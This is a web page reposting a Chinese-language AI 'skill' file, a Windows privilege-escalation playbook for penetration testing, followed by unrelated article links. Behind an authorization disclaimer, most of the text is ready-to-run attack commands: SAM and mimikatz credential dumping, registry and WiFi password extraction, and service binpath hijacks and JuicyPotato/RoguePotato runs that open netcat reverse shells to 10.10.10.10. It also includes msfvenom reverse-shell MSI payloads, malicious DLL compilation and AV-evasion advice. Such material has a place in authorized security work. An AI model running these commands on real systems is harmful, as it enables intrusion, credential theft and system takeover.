windows-privilege-escalation - SKILL

发布时间:2026/9/14 21:10:32

windows-privilege-escalation - SKILL name: windows-privilege-escalationdescription: “Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements.”risk: offensivesource: communityauthor: zebberndate_added: “2026-02-27”⚠️ 仅限授权使用此技能仅用于教育目的或授权的安全评估。在使用此工具之前你必须获得系统所有者的明确书面许可。滥用此工具是违法的并被严格禁止。强制确认门禁在运行任何对目标进行探测、利用、更改、持久化、提取数据或尝试凭据访问的命令之前要求用户说明确切的目标 URL、IP、账户或资源。要求用户确认书面授权和允许的范围。展示确切的命令并解释其预期效果。等待当前对话中的明确确认。在没有该确认的情况下保持只读状态只提供防御性指导。优先使用沙箱、一次性虚拟机或受控实验环境。仅限授权使用仅将此技能用于授权的安全评估、防御性验证或受控的教育环境。Windows 权限提升目的在渗透测试过程中为发现和利用 Windows 系统上的权限提升漏洞提供系统化的方法论。此技能涵盖系统枚举、凭据收集、服务利用、令牌模拟、内核漏洞利用以及各种允许从标准用户提升到管理员或 SYSTEM 权限的错误配置。输入 / 前提条件初始访问以标准用户身份获得 Windows 系统的 Shell 或 RDP 访问枚举工具WinPEAS、PowerUp、Seatbelt 或手动命令利用二进制预编译的漏洞利用程序或传输工具的能力知识理解 Windows 安全模型和权限授权渗透测试活动的书面许可输出 / 交付物权限提升路径识别出的通向更高权限的向量凭据转储收集到的密码、哈希或令牌提升的 Shell以管理员或 SYSTEM 身份执行命令漏洞报告错误配置和漏洞利用的文档修复建议针对已识别弱点的修复方案核心工作流1. 系统枚举基本系统信息# 操作系统版本和补丁systeminfo|findstr/B/C:OS Name/C:OS Versionwmic qfe# 架构wmic os get osarchitectureecho%PROCESSOR_ARCHITECTURE%# 环境变量setGet-ChildItemEnv:|ftKey,Value# 列出驱动器wmic logicaldisk get caption,description,providername用户枚举# 当前用户whoamiecho%USERNAME%# 用户权限whoami/priv whoami/groups whoami/all# 所有用户net userGet-LocalUser|ftName,Enabled,LastLogon# 用户详情net user administrator net user%USERNAME%# 本地组net localgroup net localgroup administratorsGet-LocalGroupMemberAdministrators|ftName,PrincipalSource网络枚举# 网络接口ipconfig/allGet-NetIPConfiguration|ftInterfaceAlias,InterfaceDescription,IPv4Address# 路由表route printGet-NetRoute-AddressFamily IPv4|ftDestinationPrefix,NextHop,RouteMetric# ARP 表arp-A# 活跃连接netstat-ano# 网络共享net share# 域控制器nltest/DCLIST:DomainName防病毒枚举# 检查 AV 产品WMIC/Node:localhost/Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName2. 凭据收集SAM 和 SYSTEM 文件# SAM 文件位置%SYSTEMROOT%\repair\SAM%SYSTEMROOT%\System32\config\RegBack\SAM%SYSTEMROOT%\System32\config\SAM# SYSTEM 文件位置%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\SYSTEM%SYSTEMROOT%\System32\config\RegBack\system# 提取哈希在获得文件后从 Linux 上执行pwdump SYSTEM SAM sam.txt samdump2 SYSTEM SAM-o sam.txt# 用 John 破解john--formatNT sam.txtHiveNightmareCVE-2021-36934# 检查漏洞icacls C:\Windows\System32\config\SAM# 如果显示以下内容则存在漏洞BUILTIN\Users:(I)(RX)# 用 mimikatz 利用mimikatz token::whoami/full mimikatz misc::shadowcopies mimikatz lsadump::sam/system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM/sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM搜索密码# 搜索文件内容findstr/SI/Mpassword*.xml*.ini*.txt findstr/sipassword*.xml*.ini*.txt*.config# 搜索注册表reg query HKLM/f password/t REG_SZ/s reg query HKCU/f password/t REG_SZ/s# Windows 自动登录凭据reg queryHKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon2nul|findstrDefaultUserName DefaultDomainName DefaultPassword# PuTTY 会话reg queryHKCU\Software\SimonTatham\PuTTY\Sessions# VNC 密码reg queryHKCU\Software\ORL\WinVNC3\Passwordreg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/v password# 搜索特定文件dir/S/B*pass*.txt *pass*.xml *cred* *vnc* *.config* where/R C:\*.iniUnattend.xml 凭据# 常见位置C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml# 搜索文件dir/s*sysprep.inf*sysprep.xml*unattend.xml 2nul# 解码 base64 密码LinuxechoU2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo|base64-dWiFi 密码# 列出配置文件netsh wlan show profile# 获取明文密码netsh wlan show profile SSID keyclear# 提取所有 WiFi 密码for/ftokens4 delims: %a in(netsh wlan show profiles ^| find Profile )doechooff nul (netsh wlan show profiles name%a keyclear|findstrSSID Cipher Key|find/vNumberecho.) echoonPowerShell 历史记录# 查看 PowerShell 历史type%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtcat(Get-PSReadlineOption).HistorySavePathcat(Get-PSReadlineOption).HistorySavePath|slspassw3. 服务利用错误的服务权限# 查找配置错误的服务accesschk.exe-uwcqvAuthenticated Users*/accepteula accesschk.exe-uwcqvEveryone*/accepteula accesschk.exe-ucqv service_name# 查找SERVICE_ALL_ACCESS、SERVICE_CHANGE_CONFIG# 利用易受攻击的服务scconfig service binpathC:\nc.exe -e cmd.exe 10.10.10.10 4444scstop servicescstartservice未加引号的服务路径# 查找未加引号的路径wmic service get name,displayname,pathname,startmode|findstr/iAuto|findstr/i/vC:\Windows\\wmic service get name,displayname,startmode,pathname|findstr/i/vC:\Windows\\|findstr/i/v# 利用在路径中放置恶意 exe# 对于路径C:\Program Files\Some App\service.exe# 尝试C:\Program.exe 或 C:\Program Files\Some.exeAlwaysInstallElevated# 检查是否启用reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer/v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer/v AlwaysInstallElevated# 两者都必须返回 0x1 才存在漏洞# 创建恶意 MSImsfvenom-p windows/x64/shell_reverse_tcp LHOST10.10.10.10 LPORT4444-f msi-o evil.msi# 安装以 SYSTEM 身份运行msiexec/quiet/qn/i C:\evil.msi4. 令牌模拟检查模拟权限# 查找这些权限whoami/priv# 可利用的权限# SeImpersonatePrivilege# SeAssignPrimaryTokenPrivilege# SeTcbPrivilege# SeBackupPrivilege# SeRestorePrivilege# SeCreateTokenPrivilege# SeLoadDriverPrivilege# SeTakeOwnershipPrivilege# SeDebugPrivilegePotato 攻击# JuicyPotatoWindows Server 2019 及以下JuicyPotato.exe-l 1337-p c:\windows\system32\cmd.exe-a/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe-t*# PrintSpooferWindows 10 和 Server 2019PrintSpoofer.exe-i-c cmd# RoguePotatoRoguePotato.exe-r 10.10.10.10-eC:\nc.exe 10.10.10.10 4444 -e cmd.exe-l 9999# GodPotatoGodPotato.exe-cmdcmd /c whoami5. 内核利用查找内核漏洞# 使用 Windows Exploit Suggestersysteminfo systeminfo.txt python wes.py systeminfo.txt# 或使用 Watson在目标上Watson.exe# 或使用 Sherlock PowerShell 脚本powershell.exe-ExecutionPolicy Bypass-File Sherlock.ps1常见内核漏洞利用MS17-010 (EternalBlue) - Windows 7/2008/2003/XP MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012 MS15-051 - Client Copy Image - 2003/2008/7 MS14-058 - TrackPopupMenu - 2003/2008/7/8.1 MS11-080 - afd.sys - XP/2003 MS10-015 - KiTrap0D - 2003/XP/2000 MS08-067 - NetAPI - 2000/XP/2003 CVE-2021-1732 - Win32k - Windows 10/Server 2019 CVE-2020-0796 - SMBGhost - Windows 10 CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/20196. 其他技术DLL 劫持# 用 Process Monitor 查找缺失的 DLL# 过滤器Result NAME NOT FOUNDPath 以 .dll 结尾# 编译恶意 DLL# 对于 x64x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll# 对于 x86i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll使用已保存凭据的 Runas# 列出已保存的凭据cmdkey/list# 使用已保存的凭据runas/savecred/user:Administratorcmd.exe /k whoamirunas/savecred/user:WORKGROUP\Administrator\\10.10.10.10\share\evil.exeWSL 利用# 检查 WSLwsl whoami# 将 root 设置为默认用户wsl--default-user root# 或ubuntu.exe config --default-user root# 以 root 身份生成 shellwsl whoami wsl python-cimport os; os.system(/bin/bash)快速参考枚举工具工具命令用途WinPEASwinPEAS.exe全面枚举PowerUpInvoke-AllChecks服务/路径漏洞SeatbeltSeatbelt.exe -groupall安全审计检查WatsonWatson.exe缺失的补丁JAWS.\jaws-enum.ps1旧版 Windows 枚举PrivescCheckInvoke-PrivescCheck权限提升检查默认可写文件夹C:\Windows\Temp C:\Windows\Tasks C:\Users\Public C:\Windows\tracing C:\Windows\System32\spool\drivers\color C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys常见权限提升向量向量检查命令未加引号的路径wmic service get pathname | findstr /i /v 弱服务权限accesschk.exe -uwcqv Everyone *AlwaysInstallElevatedreg query HKCU\...\Installer /v AlwaysInstallElevated存储的凭据cmdkey /list令牌权限whoami /priv计划任务schtasks /query /fo LIST /v模拟权限漏洞利用权限工具用法SeImpersonatePrivilegeJuicyPotatoCLSID 滥用SeImpersonatePrivilegePrintSpooferSpooler 服务SeImpersonatePrivilegeRoguePotatoOXID 解析器SeBackupPrivilegerobocopy /b读取受保护文件SeRestorePrivilegeEnable-SeRestorePrivilege写入受保护文件SeTakeOwnershipPrivilegetakeown.exe获取文件所有权约束与限制操作边界内核漏洞利用可能导致系统不稳定某些漏洞利用需要特定的 Windows 版本AV/EDR 可能检测并阻止常见工具令牌模拟需要服务账户上下文某些技术需要 GUI 访问检测注意事项凭据转储会触发安全警报服务修改会记录在事件日志中PowerShell 执行可能被监控已知漏洞利用签名会被 AV 检测法律要求只测试有书面授权的系统记录所有提升尝试避免干扰生产系统通过适当渠道报告所有发现示例示例 1服务二进制路径利用# 查找易受攻击的服务accesschk.exe-uwcqvAuthenticated Users*/accepteula# 结果RW MyService SERVICE_ALL_ACCESS# 检查当前配置scqc MyService# 停止服务并更改二进制路径scstop MyServicescconfig MyService binpathC:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exescstartMyService# 捕获 SYSTEM shell示例 2AlwaysInstallElevated 利用# 验证漏洞reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer/v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer/v AlwaysInstallElevated# 两者都返回0x1# 生成负载攻击者机器msfvenom-p windows/x64/shell_reverse_tcp LHOST10.10.10.10 LPORT4444-f msi-o shell.msi# 传输并执行msiexec/quiet/qn/i C:\Users\Public\shell.msi# 捕获 SYSTEM shell示例 3JuicyPotato 令牌模拟# 验证 SeImpersonatePrivilegewhoami/priv# SeImpersonatePrivilege 已启用# 运行 JuicyPotatoJuicyPotato.exe-l 1337-p c:\windows\system32\cmd.exe-a/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe-t*-c{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}# 捕获 SYSTEM shell示例 4未加引号的服务路径# 查找未加引号的路径wmic service get name,pathname|findstr/i/v # 结果C:\Program Files\Vuln App\service.exe # 检查写入权限 icacls C:\Program Files\Vuln App # 结果Users:(W) # 放置恶意二进制 copy C:\Users\Public\shell.exe C:\Program Files\Vuln.exe # 重启服务 sc stop Vuln App sc start Vuln App示例 5从注册表收集凭据# 检查自动登录凭据reg queryHKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon# DefaultUserName: Administrator# DefaultPassword: Pssw0rd123# 使用凭据runas/user:Administrator cmd.exe# 或用于远程psexec \\target -u Administrator -p Pssw0rd123 cmd故障排查问题原因解决方案利用失败AV 检测到AV 阻止已知漏洞利用使用混淆的漏洞利用利用系统自带工具mshta、certutil自定义编译的二进制服务无法启动二进制路径语法确保 binpath 中后有空格binpath C:\path\binary.exe令牌模拟失败权限/版本错误检查whoami /priv验证 Windows 版本兼容性找不到内核漏洞利用系统已打补丁运行 Windows Exploit Suggesterpython wes.py systeminfo.txtPowerShell 被阻止执行策略/AMSI使用powershell -ep bypass -c cmd或-enc base64何时使用此技能适用于执行概述中描述的工作流或操作。
延伸阅读

更多相关文章

2026/9/14 21:10:32

综合能源系统优化调度与Matlab实现技巧

1. 项目背景与核心价值在能源系统智能化转型的大背景下,综合能源系统(Integrated Energy System, IES)的优化调度正面临前所未有的复杂挑战。传统电力系统与热力、燃气等多能源网络的耦合,加上分时电价机制和需求响应策略的引入&a…

2026/9/14 21:10:32

Mac mini vs Pamir AI:本地Agent运行时的范式选择

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/14 21:10:32

Moo0工具箱:36款绿色工具解决音视频图片文件处理需求

1. Moo0工具箱概述Moo0工具箱是一款集合了36个绿色实用小工具的软件套装,专注于音视频处理、图片编辑和文件管理三大核心功能领域。作为一款免安装的便携式工具集,它解决了用户在日常生活和工作中常见的多媒体处理需求。这个工具箱最大的特点在于其"…

2026/9/14 21:20:33

西门子PLC恒温恒湿空调控制系统设计与实现

1. 恒温恒湿空调控制系统概述在精密制造、医药仓储、实验室等对环境要求严格的场所,恒温恒湿空调系统是保障生产质量和设备稳定运行的关键基础设施。这套系统通过PLC(可编程逻辑控制器)作为核心控制单元,配合人机界面(…

2026/9/14 21:20:33

Android混合开发:XML与Jetpack Compose的集成实践

1. 项目背景与核心挑战 在Android开发生态中,Jetpack Compose作为现代声明式UI框架已经逐渐成为主流,但大多数现存项目仍基于传统XML布局体系。我们团队最近接到一个典型需求:在一个已维护3年的电商App中,需要新增商品3D预览功能&…

2026/9/14 21:20:33

Ros2 十二:gazebo仿真

目录 1 安装 1.1 直接启动gz sim 1.1.1 直接启动仿真环境 1.2 ros2 命令行启动 ros_gz_sim 1.3 Ros2 通过launch文件启动 2 urdf添加gz_plugin 1.1 修改urdf 1.1.1 运动控制相关 1.1.2 传感器相关 1.2 launch创建消息通道ros_gz_bridge 3 仿真运行 3.1 键盘控制 4…

2026/9/14 21:20:33

软件开发中的BUG分类、诊断与高效修复指南

1. 编码BUG的本质与分类在软件开发领域,编码BUG就像潜伏在程序中的"隐形炸弹",随时可能引爆系统异常。从技术角度看,BUG是程序实际行为与预期行为之间的偏差。这种偏差可能表现为:功能失效(Feature not work…

2026/9/14 21:20:33

嵌入式软件开发五大关键环节与实战经验

1. 嵌入式软件开发项目概述 嵌入式系统作为现代科技产品的"大脑",已经渗透到我们生活的方方面面——从智能家居设备到工业控制系统,从医疗仪器到汽车电子。不同于传统的软件开发,嵌入式开发需要同时兼顾硬件特性和软件逻辑&#xf…

2026/9/14 21:15:32

“省队”商业航天排位赛:上海不只千帆一张牌

上篇我们分析了湖北商业航天的真正家底——手握全球唯一“天脑”,占据了面向未来生态的战略技术制高点。但好牌在手,出牌却是慢了半拍。这篇我们把目光转向上海——一个既有天赋又擅出牌的选手。 一、上海商业航天产业结构盘点 1、整体阵型 产业核心四要…

2026/9/14 2:17:50

拯救者Y7000黑屏故障排查与维修实战指南

1. 项目概述:一台黑屏的拯救者Y7000,到底卡在哪一步? 联想拯救者Y7000系列笔记本,从2018年第一代搭载i5-8300H开始,到后来的i7-9750H、i7-10750H、i5-11400H,再到2023年款的R7-7840HS,它始终是学…

2026/9/14 0:03:22

KCF目标跟踪算法与OTB工程实现:毕业设计实战解析

简介:这是一份基于KCF核相关滤波算法、融合尺度池与抗遮挡处理的目标检测跟踪MATLAB完整源码,主要面向计算机相关专业准备毕业设计、课程设计或期末大作业的学生,也适合需要项目实战练习的初学者。源码在OTB数据集上完成验证,能够…

2026/9/14 0:03:22

语音情感识别实战:Keras实现LSTM、CNN、SVM与MLP多模型对比

简介:面向语音情感识别入门与进阶开发者,这份基于Keras的项目源码完整实现了LSTM、CNN、SVM、MLP四种模型,兼容Python3.8与Keras/TensorFlow2环境。压缩包内含49个文件,大小约70.31MB,主体包括Python脚本、yaml/json配…

2026/9/14 11:59:31

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/14 13:53:59

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/14 11:22:57

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码